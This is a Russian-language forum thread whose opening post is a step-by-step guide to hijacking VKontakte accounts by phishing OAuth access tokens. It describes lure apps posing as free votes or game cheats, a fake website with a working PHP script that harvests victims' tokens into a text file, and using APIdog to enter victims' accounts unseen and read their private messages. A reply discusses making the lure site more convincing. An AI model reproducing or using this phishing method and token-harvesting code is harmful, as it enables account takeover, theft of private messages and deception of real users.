Влом ВК профилей через access_token, и его получение

[Coolurbo007]

Всем привет!

Видел на zhyk.ru давно тему, где кто-то создал программу для чтения ЛС по access_token ВКонтакте.
Решил написать тему, где подробно расскажу, как же получить доступ к ВК аккаунту (2 способа) с помощью access_token, и как же его "достать"

Немного о "токене": access_token - специальный "ключ" аккаунта ВКонтакте, который используется приложениями для взаимодействия с пользователем.

1 способ. - желательно создать мини веб-сайт, где Вы будете предлагать пользователю бесплатные голоса, читы в играх ВК и т.п по access_token'y
1. Нам необходимо создать Standalone-приложение (желательно назвать его типа: Бесплатные голоса, подарки ВКонтакте и т.п), и перевести его в состояние "Приложение включено и видно всем"
2. Необходимо генерировать API запрос для получения access_token'a
Пример: [Ссылки могут видеть только зарегистрированные пользователи. ]

client_id - ID вашего созданного приложения (можно посмотреть в настройках приложений)
scope - параметры, к которым приложение будет запрашивать доступ (битовая маска настроек доступа приложения)
В моем примере API запроса приложение будет запрашивать доступ практически ко всему (в т.ч личным сообщениям)
Пользователь будет видеть, к чему приложение запрашивает доступ.

Если пользователь разрешит доступ приложению, ему откроется blank.html с текстом "Пожалуйста, не копируйте данные из адресной строки для сторонних сайтов. Таким образом Вы можете потерять доступ к Вашему аккаунту."
В URL этого blank.html и будет лежать access_token, с помощью которого Вы сможете получить доступ к аккаунту.
Пример ответного запроса с access_token: [Ссылки могут видеть только зарегистрированные пользователи. ]
Думаю, здесь понятно, что из чего. Но на всякий случай:
Токеном считается всё от access_token= до символа "&".

P.S Но тут есть проблема в том, что токен Вам сам не придёт. Вам придется как-то убедить пользователя, чтобы он скопировал адресную строку и передал её Вам (или ввёл в специальную форму на Вашем сайте).

Способ 2. - более удобный способ. Тут пользователю не придется самостоятельно копировать адресную строчку. Но есть минус в том, что с этим способом Вы маловероятно сможете получить доступ к ЛС (к остальному - сможете). Тут обязательно понадобится мини веб-сайт.
1. Создайте приложение "веб-сайт". Укажите основной домен Вашего "веб-сайта", на котором Вы будете "выманивать" access_token
2. В настройках приложения переведите в состояние "Приложение включено и видно всем" , и настройте требования доступа (Вы будете иметь доступ только к тем параметрам через этот access_token, которые запросите). Желательно выбрать все параметры, кроме отправки уведомлений.
3. Создайте авторизацию через Ваше ВК-приложение на Вашем веб-сайте с редиректом на [Ссылки могут видеть только зарегистрированные пользователи. ]

Теперь нам необходимо создать сам файл vk.php, который будет обрабатывать запрос авторизации и записывать полученный access_token в .txt файл
Выглядит этот файл так:
<?
$code = $_GET['code'];
$secret = 'accesstoken'; //секретный ключ вашего приложения
$idapp = '1'; //id вашего приложения
$json = file_get_contents('https://api.vk.com/oauth/token?client_id='.$idapp.'&code='.$code.'&client_s ecret='.$secret);

$obj = json_decode($json);
$ololo = $obj->{'access_token'};
$access_token=$ololo;

echo 'Авторизация выполнена';

$log = fopen("tokens.txt","a+");
fwrite($log,"$access_token \n");
fclose($log);
?>
Изменяем параметр $secret и $idapp в коде.
Затем создаем файл tokens.txt (в этом же веб-каталоге, где и файл vk.php) и обязательно* ставим на него права доступа 777 (иначе токены не будут записываться)

Готово! Теперь, как только Ваша "жертва" войдет на Ваш сайт через ВК и попадет на vk.php, Вы получите её access_token (он будет автоматически записан в файл tokens.txt)
"Жертва взлома" после авторизации увидит довольно простой текст: "Авторизация выполнена"

-----------------------------------
1 способ более "палёвый", но с помощью него Вы можете получить более "функциональный" access_token (можно читать ЛС)
2 способ более удобный, да и догадаться о взломе там очень трудно, но с помощью полученного access_token'a Вы не сможете читать ЛС.
Но если очень постараться, можно выйти на ЛС через 2-й способ.

И теперь, наверное, самое главное -
Как войти в аккаунт, имея access_token?
Войти в аккаунт через access_token можно с помощью сервиса APIdog ([Ссылки могут видеть только зарегистрированные пользователи. ]). Он очень удобный.
([Ссылки могут видеть только зарегистрированные пользователи. ])
Вставляйте полученный Вами access_token, и входите.

Еще есть вариант использовать API запросы для действий с аккаунтом, но это достаточно трудно и долго.
И напоследок: APIdog по умолчанию делает сессию "офлайн". Никто не узнает, что Вы сейчас онлайн.
Все действия, которые Вы делайте на аккаунте "жертвы", отмечаются как выполненные через приложение, через которое был получен access_token.

Вот и всё!
Надеюсь, объяснил понятно.
Задавайте вопросы - отвечу.

[rodigy]

так это ж надо делать подобие целевого сайта, иначе сразу понятно что приложение пустышка и ничего кроме авторизации не делает,и более менее адекватные пользователи сразу удалят такое приложение. И кстати токенне вечный, как долго он живет? Имхо лучше через апи делать...